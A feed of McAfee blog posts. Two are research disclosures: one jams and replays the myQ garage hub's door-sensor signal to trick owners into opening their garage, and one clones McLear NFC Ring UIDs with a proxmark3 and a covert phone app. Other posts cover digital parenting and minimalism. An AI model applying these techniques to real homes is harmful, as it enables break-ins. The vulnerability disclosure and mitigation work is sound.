We Be Jammin’ – Bypassing Chamberlain myQ Garage Doors https://www.mcafee.com/blogs/other-blogs/mcafee-labs/we-be-jammin-bypassing-chamberlain-myq-garage-doors/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/we-be-jammin-bypassing-chamberlain-myq-garage-doors/#respond Tue, 07 Jan 2020 05:01:55 +0000 /blogs/?p=97928

The idea of controlling your garage door remotely and verifying that everything is secure at home, or having packages delivered directly into your garage is enticing for many people. The convenience that many of these IOT devices provide often persuades consumers away from thinking about the possible security concerns. McAfee Advanced Threat Research recently investigated […]

The post We Be Jammin’ – Bypassing Chamberlain myQ Garage Doors appeared first on McAfee Blogs.

]]>

The idea of controlling your garage door remotely and verifying that everything is secure at home, or having packages delivered directly into your garage is enticing for many people. The convenience that many of these IOT devices provide often persuades consumers away from thinking about the possible security concerns.

McAfee Advanced Threat Research recently investigated Chamberlain’s MyQ Hub, a “Universal” garage door automation platform. The way Chamberlain has made this device universal is via a Hub, which acts as a new garage door opener, similar to the one that you would have in your car. This allows the MyQ Hub to retrofit and work with a wide variety of garage doors.

We found that Chamberlain did a fairly good job of securing this device, which is typically uncommon for IOT devices. However, we discovered that there is a flaw in the way the MyQ Hub communicates with the remote sensor over radio frequencies.

From an attack perspective there are three main vectors that we began to look at: local network, remote access (API, or third-party integration), and RF communications between the sensor and the Hub. The first thing we attempted was to gain access to the device via the local network. A quick port scan of the device revealed that it was listening on port 80. When attempting to navigate to the device at port 80 it would redirect to start.html and return a 404 error. No other ports were open on the device.

The inside of the Chamberlain MyQ Hub

Disassembling the Hub revealed a small SOC (system on a chip) module that was handling the Wi-Fi and web communications and a secondary PIC microcontroller which was responsible for controlling the RF side of things for both the garage door and the remote door sensor. The MyQ Hub listed on FCC’s website also included a Bluetooth module that was not present on the two MyQ Hubs that we purchased.

The UART connection was disconnected or not enabled, but the JTAG connection worked to communicate directly with the main Wi-Fi module. With the JTAG connection we were able to dump the entire contents of the flash chip and debug the system unrestricted. The main Wi-Fi module was a Marvell microcontroller that was running a RTOS (Real Time Operating System), which acts much different than a normal Linux system. While it will still run predefined applications, RTOS’ usually don’t have a filesystem like traditional systems do.  We extracted the entire contents of the Marvell microprocessor, and were able to analyze the assembly and determine how the web server behaves.

From looking through the web server code we were able to identify how the device is setup through the local API as well as finding some interesting, albeit not very useful commands that we could send.

Local API commands

There were more URLs that we found to be accessible and some additional API paths, but nothing stood out as a good place to start an attack from. At this point we decided to investigate the other attack vectors.

We didn’t spend too much time looking into the third-party attack vector and remote API since it becomes sort of a gray area for researching. While we were testing with the /sys/mode API call we were able to put the device into a soft factory reset, where we were able to attempt to add the device to a different account. From capturing the SSL traffic on the mobile application, we were able to see that it was failing since the serial number was already registered to another account. We used a technique called SSL unpinning to decrypt traffic from the Android application; we’ll post a future blog explaining this process in greater detail. One thing that we wanted to try was to modify the Android app to send a different serial number. Since we don’t believe that the device ever cleared the original garage door information, we could have potentially opened the device from the new account. However, this is all speculation and was not tested because we didn’t want to access the remote API.

The last vector we looked at was RF. We began trying to break down the frequency modulation between the remote door sensor and the Hub. We originally thought it was some sort of FSK (frequency shift keying) where data is transmitted digitally. If the signal is in one frequency the corresponding bit is 0 and if the signal is shown on another frequency the bit is 1. This idea was thrown out since the MyQ remote sensor was using 3 different frequencies not just two.

Looking at the door sensor’s FCC filing we noticed a particularly helpful revision that they made.

OOK stands for “On OFF Keying” and is another method of encoding digital bits into RF. OOK will either be sending a signal (1) or not sending a signal (0). This means both the transmitter and receiver must be synchronized.

On Off Keying Graphical Representation

Here is the binary representation for the signal captured from the MyQ remote door sensor. This is a tightly zoomed-in window of the entire signal.

One full message captured, each color is a different frequency

aaaaaaaa559999aa59655659a6965aa9a99996aa6aa0aaaaaaaa55a9699a6566696699555a6a5556966555500aaaaaaaa559999aa59655659a6965aa9a99996aa6aa

We can observe the state transmission captured from all three frequencies and converted to hexadecimal. It’s easy to identify data patterns within the transmission, as represented in color above, but we were never able to crack it to arbitrarily transmit false states from our SDR (Software Defined Radio). We also noticed that the RF engineers at Chamberlain had security in mind not only by separating the signal into three separate frequencies, but also by implementing rolling codes. You may be familiar with the rolling code technique from things like your standard garage door opener or your car key fob. Rolling code devices prevent an attacker from directly capturing a signal and replaying it. This is prevented by the signal containing a unique identifier that is noted by the receiver and if the receiver ever sees that signal with the unique ID again it will ignore it.

The way attackers have overcome rolling code devices is by a method called “Roll Jam.” An attacker will jam the rolling code signal from the transmitter, blocking it from ever making it to the receiver, while simultaneously capturing the valid rolling code and storing it. This way the attacker now has an unused and valid rolling code that the receiver has never seen before. The caveat to this method is that normally the victim will notice that either the garage door or car didn’t unlock. A stealthier method to Roll Jam is always capturing the latest code and replaying the latest signal minus 1. This way the car or door will open but the attacker still owns the latest code for their use.

The MyQ also had a rolling code implementation that we were able to develop a variant of this technique against. We took the concept of jamming the original code from the receiver by transmitting a large amount of “noise” directly adjacent to the valid signal frequency. This causes the receiver in the MyQ Hub to overload and not hear the valid signal. However, with the precision of the SDR, we were able to ignore the noise that we are transmitting and store the signal. This was further complicated by the fact that there were three frequencies that we had to simultaneously listen for and jam. If you are interested in this FHSS (Frequency Hopping Spread Spectrum) Roll Jam technique, please read our white paper.

Within the research related to Chamberlain Garage Door Hub described in this blog, the only interference was to unlicensed spectrum radio frequency for the minimum period while the garage door hub was transmitting state signal, and there was no interference with any communications signal licensed or authorized under the Communications Act or FCC rules.

This technique worked, but since the remote sensor and the MyQ Hub always have the advantage in RF landscape, it was unreliable. The jamming aspect of the attack worked nicely; however, since we are outside of the garage and the remote sensor and the Hub are both located within the same garage, it is harder to jam and listen at the same time with the garage door and walls acting as barriers. With higher powered radios, frequency-tuned antennas, and disregard for FCC’s laws, the jamming of the remote sensor could take place at a much further distance than we were able to test in our lab environment.

A waterfall view of the remote sensor signal (red) and jamming (black)

With our jamming working reliably, we confirmed that when a user closes the garage door via the MyQ application, the remote sensor never responds with the closed signal because we are jamming it. The app will alert the user that “Something went wrong. Please try again.” This is where a normal user, if not in direct sight of the garage door, would think that their garage door is indeed open, when in reality it is securely closed. If the user believes the MyQ app then they would do as the application indicates and “try again” – this is where the statelessness of garage doors comes into play. The MyQ Hub will send the open/closed signal to the garage door and it will open, because it is already closed, and it is simply changing state. This allows an attacker direct entry into the garage, and, in many cases, into the home.

Since now the garage door is really open the attacker probably doesn’t want to leave the state as-is, notifying the victim that something went wrong again. Putting the garage door into a closed state and allowing the app to clear the error will put the victim at ease. This could be executed either by a replay from a previously captured closed signal, or, in the most simplistic manner by removing the remote sensor from the Velcro on the garage door and placing it in the vertical position, signaling to the Hub that the door closed successfully.

Attack Reproduction State Flowchart

We also realized that in a real-world scenario, an attacker wouldn’t likely sit outside of a garage all day, so we decided to automate the attack. We used GNU radio to implement a JIT (just in time) method of jamming where the SDR will sit dormant listening on the MyQ’s three separate frequencies. The moment it notices that the remote door sensor is beginning a transmission, it will dynamically enable and start jamming of the signal.

GNU Radio JIT Jamming and State Capture over 3 Simultaneous Frequencies

This expands the use cases of this type of attack by being able to create a small device that could be placed out of sight near the garage door. This technique is also described in more detail in our FHSS white paper. The JIT jamming makes it very difficult to locate the device using RF triangulation and allows it to be better equipped for battery operation.

While this may not be too common for individuals using the MyQ Hub, recall the earlier reference to third-party partnerships with MyQ for garage delivery. Another possible attack would be when a delivery driver uses the application. The primary reason users sign up for this service is the concept of a package delivery to a secure location (garage) even when they are not home. The victim can be absent from the property yet have access via the MyQ app over the internet to open or close the garage door if a delivery driver uses the MyQ hub for an in-garage delivery. A determined hacker could pull this attack off and the victim may have a higher probability of believing that the door may in fact be open. We disclosed our findings in full to Chamberlain on 9/25/2019, including detailed reproduction steps for the jamming attack. We also talked to Chamberlain on this issue with the third-party delivery drivers and how it could fit into this attack model. After extensive testing and validation of the issue, the vendor released an update to the myQ App as of version 4.145.1.36946. This update provides a valuable warning message to users indicating the garage door state may not be accurate, but it does not eliminate the user from remotely controlling the door itself.

The beauty of IOT devices are that they solve problems that we have learned to deal with. After we experience the convenience and the way these devices can automate, secure, or assist in our lives it is hard to see them ever going away. This ease and automation often overshadows the potential security threat that they may pose. Even simple enhancements to manual products over time have this effect; take for example the now-legacy garage door opener in your car. The ability to capture and replay the basic signals transformed the threat from physical to digital space. While the Chamberlain MyQ Hub ultimately produces a generally more secure method of accessing garages than its predecessors, consumers should be aware that any extension of a technology platform, such as using WiFi, a mobile app and FHSS RF transmissions, also extends possible threat vectors.

We would like to finish by commenting that the likelihood of a real-world attack on this target is low, based on the complexity of the attack and installation footprint. We have discussed this with Chamberlain, who has validated the findings and agrees with this assessment. Chamberlain has made clear efforts to build a secure product and appears to have eliminated much of the low-hanging fruit common to IoT devices. This vendor has been a pleasure to work with and clearly prioritizes security as a foresight in the development of its product.

NOTE: Within the research related to Chamberlain Garage Door Hub described in this blog, the only interference was to unlicensed spectrum radio frequency for the minimum period while the garage door hub was transmitting state signal, and there was no interference with any communications signal licensed or authorized under the Communications Act or FCC rules.

 

 

The post We Be Jammin’ – Bypassing Chamberlain myQ Garage Doors appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/we-be-jammin-bypassing-chamberlain-myq-garage-doors/feed/ 0
The Cloning of The Ring – Who Can Unlock Your Door? https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-cloning-of-the-ring-who-can-unlock-your-door/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-cloning-of-the-ring-who-can-unlock-your-door/#respond Tue, 07 Jan 2020 05:01:14 +0000 /blogs/?p=97916

Steve Povolny contributed to this report. McAfee’s Advanced Threat Research team performs security analysis of products and technologies across nearly every industry vertical. Special interest in the consumer space and Internet of Things (IoT) led to the discovery of an insecure design with the McLear NFC Ring a household access control device. The NFC Ring […]

The post The Cloning of The Ring – Who Can Unlock Your Door? appeared first on McAfee Blogs.

]]>

Steve Povolny contributed to this report.

McAfee’s Advanced Threat Research team performs security analysis of products and technologies across nearly every industry vertical. Special interest in the consumer space and Internet of Things (IoT) led to the discovery of an insecure design with the McLear NFC Ring a household access control device. The NFC Ring can be used to interact with NFC-enabled door locks which conform to the ISO/IEC 14443A NFC card type. Once the NFC Ring has been paired with the NFC enabled door lock, the user can access their house by simply placing the NFC Ring within NFC range of the door lock.

McLear originally invented the NFC Ring to replace traditional keys with functional jewelry. The NFC Ring uses near field communication (NFC) for access control, to unlock and control mobile devices, share and transfer information, link people and much more. McLear NFC Ring aims to redefine and modernize access control to bring physical household security through convenience. Their latest ring also supports payment capability with McLear Smart Payment Rings, which were not in scope for this research.

Identity is something which uniquely identifies a person or object; an NFC tag is a perfect example of this. Authentication can be generally classified into three types; something you know, something you have and something you are. A NFC Ring is different from the general NFC access tag devices (something you have) as the Ring sits on your finger, so it is a hybrid authentication type of something you have and something you are. This unique combination, as well as the accessibility of a wearable Ring with NFC capabilities sparked our interest in researching this product as an NFC-enabled access control device. Therefore, the focus of our research was on NFC Ring protection against cloning as opposed to the door lock, since NFC access control tags and door locks have been well-researched.

The research and findings for this flaw were reported to McLear on September 25, 2019. To date, McAfee Advanced Threat Research has not received a response from the vendor.

Duplicating Keys Beyond the Hardware Store

In the era of Internet of Things (IoT), the balance between security and convenience is an important factor to get right during the concept phase of a new product and the bill of materials (BOM) selection. The hardware selection is critical as it often determines the security objectives and requirements that can be fulfilled during design and implementation of the product lifecycle. The NFC Ring uses an NFC capable Integrate Circuit (IC) which can be easily cloned and provides no security other than NFC proximity. The NFC protocol does not provide authentication and relies on its operational proximity as a form of protection. The problem with NFC Tags is that they automatically transmit their UID when in range of NFC device reader without any authentication.

Most consumers today use physical keys to secure access to their household door. The physical key security model requires an attacker to get physical access to the key or break the door or door lock. The NFC Ring, if designed securely, would provide equal or greater security than the physical key security model. However, since the NFC Ring can be easily cloned without having to attain physical access to the Ring, it makes the product’s security model less secure than a consumer having a physical key.

In this blog we discuss cloning of the NFC Ring and secure design recommendations to improve its security to a level equal to or greater than existing physical keys.

NFC Ring Security Model and Identity Theft

All McLear non-payment NFC Rings using NTAG216 ICs are impacted by this design flaw. Testing was performed specifically on the OPN which has an NTAG216 IC. The NFC Ring uses the NTAG 216 NFC enabled Integrated Circuit (IC) to provide secure access control by means of NFC communication.

The NFC protocol provides no security as it’s just a transmission mechanism.  The onus is on product owners to responsibly design and implement a security layer to meet the security objectives, capable of thwarting threats identified during the threat modeling phase at concept commit.

The main threats against an NFC access control tag are physical theft and tag cloning by NFC. At a minimum, a tag should be protected against cloning by NFC; with this research, it would ensure the NFC Ring provides the same level of security as a physical key. Ideal security would also protect against cloning even when the NFC Ring has been physically stolen which would provide greater security than that of a physical key.

The NTAG216 IC provide the following security per the NFC Ring spec:

  1. Manufacturer programmed 7-byte UID for each device
  2. Pre-programmed capability container with one-time programmable bits
  3. Field programmable read-only locking function
  4. ECC based originality signature
  5. 32-bit password protection to prevent unauthorized memory operations

The NFC Ring security model is built on the “Manufacturer programmed 7-byte UID for each device” as the Identity and Authentication with the access control principle or door lock. This 7-byte UID (unique identifier) can be read by any NFC enabled device reader such as a proxmark3 or mobile phone when within NFC communication range.

The NFC Ring security model can be broken by any NFC device reader when they come within NFC communication range since the static 7-byte UID is automatically transmitted without any authentication. Once the 7-byte UID has been successfully read, a magic NTAG card can be programmed with the UID, which forms a clone of the NFC Ring and allows an attacker to bypass the secure access control without attaining physical access to the NFC Ring.

The NFC Ring is insecure by design as it relies on the static 7-byte UID programmed at manufacture within the NTAG216 for device identity and authentication purposes. The NFC Ring security model relies on NFC proximity and a static identifier which can be cloned.

In addition, we discovered that the UIDs across NFC Rings maybe predictable (this was a very small sample size of three NFC Rings):

  • NFC Ring#1 UID 04d0e722993c80
  • NFC Ring#2 UID 04d24722993c80
  • NFC Ring#3 UID 04991c4a113c80

There is only a 22-byte difference between the UID of NFC Ring#1 and NFC Ring#2 (0x24-0x0e). By social engineering when a victim purchased their NFC Ring, an attacker could purchase a significant sample size of NFC Rings around the same time and possibly brute force their NFC Ring UID.

Social Engineering

Social Engineering consists of a range of techniques which can be used through human interaction for many malicious purposes such as identity theft. In the case of the NFC Ring the goal is to steal the user’s identity and gain access to their home. Reconnaissance can be performed online to gain background information such as what type of technology is being used by the victim for their home access.

One of the most common exchanges of technology today has become the passing of a phone between two untrusted parties to take a picture. The NFC Ring social engineering attack could be as simple as requesting the victim to take a picture with the attacker-supplied phone. The victim-as-helpful-photographer holds the attacker’s phone, which can read NFC tags and could be equipped with a custom Android app to read the NFC Ring UID, all transparent to the victim while they are snapping away. There is no sign to the victim that their NFC Ring is being read by the phone. It is recorded in the system log and cannot be viewed until a USB cable is attached with required software. Once the Ring is compromised, it can be reprogrammed on a standard writable card, which can be used to unlock smart home locks that partner with this product. The victim’s home is breached.

How It’s Done: NFC Ring Cloning

To successfully clone an NFC Tag, one must first identify the Tag type. This can be done by looking up the product specifications in some cases, or verifying by means of an NFC device reader such as a proxmark3.

From the NFC Ring specs we can determine most of the required tag characteristics:

  1. IC Model: NTAG216
  2. Operating Frequency: 13.56Mhz
  3. ISO/IEC: 14443A
  4. User writable space: 888 bytes
  5. Full specifications

In addition, by communicating with a proxmark3 attackers can physically verify the NFC Tag characteristics and obtain the UID which is required for cloning.

The most straightforward method to stealing the unique identifier of the Ring would be through a mobile phone. The following steps were taken in the below demo:

  1. Reading of NFC Ring with proxmark3 and cloning NTAG21x emulator card
  2. Setting attacker’s phone to silent to prevent NFC Tag detection sound
  3. Running our customized Android app to prevent Android activity popup when NFC Tag detected and read.

Mitigation Secure Design Recommendations

Lock the door. The existing insecure design can be mitigated by using NFC Doorlock password protection in combination with the NFC Ring for two factor authentication.

Authenticate. NFC Ring designers must mandate a secure PKI design with an NFC Tag which contains a crypto module that provides TAG authentication. The NFC Ring secure design must mandate a security layer on top of NFC to access control device manufacturers to ensure secure and trustworthy operation.

Randomize UIDs. In addition, the NFC designers must ensure they are not manufacturing NFC Rings with sequential UIDs which may be predictable with purchase date.

Consumer Awareness

To make customers aware of the security risks associated with products available on the market, product manufacturers should clearly state the level of security which their product provides in comparison with the technology or component they claim to be advancing. Are customers holding the master key to unlock their door, and are there duplicates?

In the case of the NFC Ring, while convenient, it clearly does not provide the same level of security to consumers as a physical key. This decrease in security model from a physical key to a NFC Ring is not due to technology limitations but due to an insecure design.

 

The post The Cloning of The Ring – Who Can Unlock Your Door? appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-cloning-of-the-ring-who-can-unlock-your-door/feed/ 0
The Tradeoff Between Convenience and Security – A Balancing Act for Consumers and Manufacturers https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-tradeoff-between-convenience-and-security-a-balancing-act-for-consumers-and-manufacturers/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-tradeoff-between-convenience-and-security-a-balancing-act-for-consumers-and-manufacturers/#respond Tue, 07 Jan 2020 05:01:01 +0000 /blogs/?p=97914

This week McAfee Advanced Threat Research (ATR) published new findings, uncovering security flaws in two popular IoT devices: a connected garage door opener and a “smart” ring, which, amongst many uses, utilizes near field communication (NFC) to open door locks. I’d like to use these cases as examples of a growing concern in the area […]

The post The Tradeoff Between Convenience and Security – A Balancing Act for Consumers and Manufacturers appeared first on McAfee Blogs.

]]>

This week McAfee Advanced Threat Research (ATR) published new findings, uncovering security flaws in two popular IoT devices: a connected garage door opener and a “smart” ring, which, amongst many uses, utilizes near field communication (NFC) to open door locks.

I’d like to use these cases as examples of a growing concern in the area of product security. The industry of consumer devices has seen some positive momentum for security in recent years. For example, just a few years back, nearly every consumer-grade router shipped with a default username and password, which, if left unchanged, represented a serious security concern for home networks. At a minimum, most routers at least now ship with a unique password printed on the physical device itself, dramatically increasing the overall network security. Despite positive changes such as this, there is a long way to go.

If we think about the history of garage doors, they began as a completely manual object, requiring the owner to lift or operate it physically. The first overhead garage door was invented in the early 1920s, and an electric version came to market just a few years later. While this improved the functionality of the device and allowed for “remote” entry, it wasn’t until many years later that an actual wireless remote was added, giving consumers the ability to allow wireless access into their home. This was the beginning of an interesting tradeoff for consumers – an obvious increase in convenience which introduced a potential new security concern.

The same concept applies to the front door. Most consumers still utilize physical keys to secure the front door to their homes. However, the introduction of NFC enabled home door locks, which can be opened using compatible smart rings, adds both convenience and potentially compromised security.

For example, upon investigating the McLear NFC Ring, McAfee ATR uncovered a design insecurity, which could allow an attacker to easily clone the NFC Ring and gain entry to a home utilizing an NFC enabled smart lock.

While the NFC Ring modernizes physical household security, the convenience that comes with technology implementation also introduces a security issue.

The issue here is at a higher level; where and when do we draw the line for convenience versus security? The numerous benefits technology enhancements bring are exciting and often highly valuable; but many are unaware of the lengths cyber criminals will go to (for example, we once uncovered a vulnerability in a coffee pot which we were able to leverage to gain access to a home Wi-Fi network) and the many ways new features can reduce the security of a system.

As we move towards automation and remote access to nearly every computerized system on the planet, it’s our shared responsibility to maintain awareness of this fact and demand a higher bar for the products that we buy.

So what can be done? The responsibility is shared between consumers and manufacturers, and there are a few options:

For consumers:

  • Practice proper cyber hygiene. From a technical perspective, consumers have many tools at their disposal, even when security concerns do manifest. Implement a strong password policy, put IoT devices on their own, separate, network, utilize dual-factor authentication when possible, minimize redundant systems and patch quickly when issues are found.
  • Do your research. Consumers should ensure they are aware of the security risks associated with products available on the market.

For product manufacturers:

  • Manufacturer supported awareness. Product manufacturers can help by clearly stating the level of security their product provides in comparison with the technology or component they seek to advance.

Embrace vulnerability disclosure. Threat actors are constantly tracking flaws which they can weaponize; conversely, threat researchers are constantly working to uncover and secure product vulnerabilities. By partnering with researchers and responding quickly, vendors have a unique opportunity

The post The Tradeoff Between Convenience and Security – A Balancing Act for Consumers and Manufacturers appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-tradeoff-between-convenience-and-security-a-balancing-act-for-consumers-and-manufacturers/feed/ 0
Do You Have Blind Spots? McAfee Welcomes Check Your Blind Spots Bus Tour https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/do-you-have-blind-spots-mcafee-welcomes-check-your-blind-spots-bus-tour/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/do-you-have-blind-spots-mcafee-welcomes-check-your-blind-spots-bus-tour/#respond Mon, 06 Jan 2020 17:53:38 +0000 /blogs/?p=97908

A bus, virtual reality, and conversations around inclusion. How do all these fit together? The answer: CEO Action’s Check Your Blind Spots Bus Tour. Working at McAfee means innovating in everything we do – it’s imperative for us to stay a step ahead of cyberattacks. This includes new approaches to challenge thinking about diversity. That’s […]

The post Do You Have Blind Spots? McAfee Welcomes Check Your Blind Spots Bus Tour appeared first on McAfee Blogs.

]]>

A bus, virtual reality, and conversations around inclusion.

How do all these fit together? The answer: CEO Action’s Check Your Blind Spots Bus Tour.

Working at McAfee means innovating in everything we do – it’s imperative for us to stay a step ahead of cyberattacks. This includes new approaches to challenge thinking about diversity. That’s where CEO Action and Check Your Blind Spots Bus Tour comes in.

In December, McAfee was honored to be among the one hundred stops around the country of an interactive, eye-opening mobile tour that used virtual reality and gaming technology to help us recognize unconscious biases or blind spots.

Inside the Tour Bus

When the tour bus rolled up, McAfee team members lined up to uncover unconscious bias in a new way with immersive gaming technology. Some of the interactive elements included:

  • Wake Up Call: A 100% audio experience, through a wall of ringing phones, McAfee team members picked up a receiver to overhear conversations between landlords, tenants, and potential renters that reveal unintended bias.
  • Look Through a Different Lens: Via gamification and digital viewfinder, McAfee team members watched an interaction between co-workers setting up a work-related event and then, identified moments when unconscious biases are demonstrated.
  • Face Yourself, Face Reality: In front of a mirror, McAfee team members watched as their reflection fades away to reveal a different person staring back at them. Through this touchscreen experience, each new reflection shares a series of biases they’ve experienced.

McAfee team members share their experience:

Sign the I Act On Pledge

Ready to take action and drive inclusive behaviors in your day-to-day life? Join the hundreds of McAfee employees who signed the I Act On Pledge to do just that.

I pledge to check my bias, speak up for others and show up for all.

Take the pledge.

 

It’s a new year! Start off strong with a company that’s invested in building an inclusive workplace. Search our openings.

The post Do You Have Blind Spots? McAfee Welcomes Check Your Blind Spots Bus Tour appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/do-you-have-blind-spots-mcafee-welcomes-check-your-blind-spots-bus-tour/feed/ 0
Digital Minimalism: Is It Time to Overhaul Your Relationship with Technology? https://www.mcafee.com/blogs/consumer/family-safety/digital-minimalism-is-it-time-to-overhaul-your-relationship-with-technology/ https://www.mcafee.com/blogs/consumer/family-safety/digital-minimalism-is-it-time-to-overhaul-your-relationship-with-technology/#comments Sat, 04 Jan 2020 15:00:37 +0000 /blogs/?p=97889 digital minimalism

Editor’s Note: This is part I of a series on Digital Minimalism in 2020. When Steve Jobs introduced the iPhone in 2007, he called it the “best iPod ever,” and said it would be a “very cool way” to make calls and listen to music. Little did he know that it would be the catalyst […]

The post Digital Minimalism: Is It Time to Overhaul Your Relationship with Technology? appeared first on McAfee Blogs.

]]>
digital minimalism

Editor’s Note: This is part I of a series on Digital Minimalism in 2020.

When Steve Jobs introduced the iPhone in 2007, he called it the “best iPod ever,” and said it would be a “very cool way” to make calls and listen to music. Little did he know that it would be the catalyst to a future technology tsunami of social networks, apps, and gaming platforms that would come to own our collective attention span.

But here we are. We daily enter an algorithm ecosystem that has little to do with our initial desire to connect with friends and have a little fun. We’ve gone from fumbling to find our flip phones to checking our phones 96 times a day —that’s once every 10 minutes, according to recent research

We’re getting it

However, with more time and knowledge behind us, parents and consumers are starting to get it.

We now know that companies deliberately engineer our favorite digital destinations to get us hooked. With every “like,” emoji, comment, and share, companies have figured out how to tap into our core human motivators of sensation, anticipation, which keeps our dopamine levels amped the same way tobacco, gambling, or overeating might do. 

This evolution of marketing and economics has hit us all hard and fast. But as Maya Angelou famously said, when we know better, we can do better. Stepping into 2020 may be the best time to rethink — and totally reconstruct — our relationship with technology.

digital minimalism

Digital Detox vs. Digital Minimalism

We’ve talked a lot about digital detox strategies, which, no doubt, have helped us reduce screen time and unplug more. However, there’s a new approach called digital minimalism that may offer a more long-term, sustainable solution to our tech-life balance.

The difference in approaches is this: A detox implies you will stop for a brief period and then resume activities. Digital minimalism is stopping old habits permanently and reconstructing a new way forward.

Digital minimalism encourages us to take a long, hard, honest look at our relationship with technology, be open to overhauling our ideology, and adopt a “less is more” approach.

Author Cal Newport examines the concept in his book, Digital Minimalism: Choosing a Focused Life in a Noisy World and is based on three principles: a) clutter is costly b) optimization is important c) intentionality is satisfying. 

According to Newport, digital minimalism allows us to rebuild our relationship with technology so that it serves us — not the other way around. Here’s the nugget: When you can clearly define and understand your values, you can make better, more confident decisions about what technology you use and when.

Three core principles

• Scrutinize value. Digital clutter is costly. Therefore, it’s critical to examine every piece of technology you allow into your life and weigh it against what it costs you in time, stress, and energy.

Ask yourself: 

What am I genuinely gaining from the time I am spending on this site?
What is being here costing me in terms of money and attention?
What emotions rise (positive, negative) when I’m using this app/site?
Can I perform the same task differently?

• Optimize resources. You don’t have to throw out all your technology to be a digital minimalist. Instead, optimization is determining what digital sources bring you the most value. For example, you may habitually scroll six news sources each day when you only gain value from two. You may have six active social networks you frequent out of obligation or habit when only one actually offers you value and genuine connection.

Ask yourself:

What app/site is the most accurate and valuable to me?
What app/site feed my emotions, goals, and relationships in a positive, healthy way?
What app/site helps me personally to work more efficiently?

• Align tech with values. The third principle of intentionality is inspired by the Amish way of life and encourages holding every technology decision up against your fundamental values. For instance, if spending time on a specific app doesn’t support your priorities of family and personal health, then that fun, albeit misaligned app does not make the cut. 

Ask yourself:

Does this activity benefit and support my values and what I’m trying to do in my life?
Am I better off without this online activity?

Getting started

  • 30-days of less. For 30 days, cut out all non-essential technology from your life. Use only what is essential to your income and health. 
  • Reflect on values. Reflect on the things that are truly important to you and your family. Think about what activities bring you joy and which specific people interest you. If you decide that creating art or volunteering are your central values, ask yourself, “Does this technology support my value of creating art and volunteering?”
  • Increase solitude. Researchers have found a connection between lack of solitude and the increase in depression and anxiety among digital natives (iGen) they call isolation depravation. Solitude allows us to process, reflect, and problem solve. Little by little, begin to increase your time for personal reflection. 

While it’s easy to demonize the growing presence and power of technology (smartphones and social media specifically) in family life, it’s also added amazing value and isn’t going anywhere soon. So we do what we can do, which is to stop and examine the way we use technology daily and the amount of control we give it over our time, hearts, and minds. 

The post Digital Minimalism: Is It Time to Overhaul Your Relationship with Technology? appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/digital-minimalism-is-it-time-to-overhaul-your-relationship-with-technology/feed/ 2
Lessons Learned: A Decade of Digital Parenting https://www.mcafee.com/blogs/consumer/family-safety/lessons-learned-a-decade-of-digital-parenting/ https://www.mcafee.com/blogs/consumer/family-safety/lessons-learned-a-decade-of-digital-parenting/#respond Sat, 28 Dec 2019 22:41:12 +0000 /blogs/?p=97871 digital parenting

Give yourself a high-five, parents. Pour yourself a cup of coffee or your favorite celebratory drink and sip it slow — real slow. Savor the wins. Let go of the misses. Appreciate the lessons learned. You’ve come a long way in the last decade of raising digital kids, and not all of it has been […]

The post Lessons Learned: A Decade of Digital Parenting appeared first on McAfee Blogs.

]]>
digital parenting

Give yourself a high-five, parents. Pour yourself a cup of coffee or your favorite celebratory drink and sip it slow — real slow. Savor the wins. Let go of the misses. Appreciate the lessons learned. You’ve come a long way in the last decade of raising digital kids, and not all of it has been easy.

As we head into 2020, we’re tossing parenting resolutions (hey, it’s a victory to make it through a week let alone a year!). Instead, we’re looking back over the digital terrain we’ve traveled together and lessons learned. Need a refresher? Here’s a glimpse of how technology has impacted the family over the past decade.

In the last decade

• Smartphone, social, gaming growth. Social media and gaming platforms have exploded to usage and influence levels no one could have imagined. Smartphone ownership has increased and as of 2019: 81% of adults own a smartphone and 72% use social media, 53% of kids own a smartphone by the age of 11, and 84 % of teenagers have phones.

• Video platform growth. Video platforms like YouTube have become the go-to for teens and tweens who spend nearly three hours a day watching videos online.

• Streaming news. Smartphones have made it possible for all of us to carry (and stream) the world in our pockets. In 2018, for the first time, social media sites surpassed print newspapers as a news source for Americans.

• Dating apps dominate. We’re hooking up, dating, and marrying using apps. A Stanford study found that “heterosexual couples are more likely to meet a romantic partner online than through personal contacts and connections.”

• The rise of the Influencer. Internet influencers and celebrities have reached epic levels of fame, wealth, and reach, creating an entire industry of vloggers, gamers, micro and niche-influencers, and others who have become “instafamous.”

• Lexicon changes. Every day, technology is adding terms to our lexicon that didn’t exist a decade ago such as selfie, OMG, streaming, bae, fake news, the cloud, wearables, finsta, influencers, emojis, tracking apps, catfish, digital shaming, screen time, cryptojacking, FOMO, and hashtag, along with hundreds of others.

What we’ve learned (often the hard way)

Most people, if polled, would say technology has improved daily life in incalculable ways. But ask a parent of a child between five and 18 the same question, and the response may not be as enthusiastic. Here are some lessons we’ve learned the hard way.

Connection brings risk. We’ve learned that with unprecedented connection comes equally unprecedented risk. Everyday devices plug our kids directly into the potential for cyberbullying, sexting, inappropriate content, and mental health issues.  Over the past decade, parents, schools, and leaders have worked to address these risks head-on but we have a long way to go in changing the online space into an emotionally safe and healthy place.

Tech addiction isn’t a myth.  To curb the negative impact of increased tech use, we’ve learned ways to balance and limit screen time, unplug, and digitally detox. Most importantly, it’s been confirmed that technology addiction is a medical condition that’s impacting people and families in very painful ways.

The internet remembers. We’ve witnessed the very public consequences of bad digital choices. Kids and adults have wrecked scholarships, reputations, and careers due to careless words or content shared online. Because of these cases, we’re learning — though never fast enough — to think twice about the behaviors and words we share.

We’re equipping vs. protecting. We’ve gone from monitoring our kids aggressively and freaking out over headlines to realizing that we can’t put the internet in a bottle and follow our kids 24/7. We’ve learned that relevant, consistent conversation, adding an extra layer of protection with security software, and taking the time to understand (not just monitor) the ways our kids use new apps, is the best way to equip them for digital life.

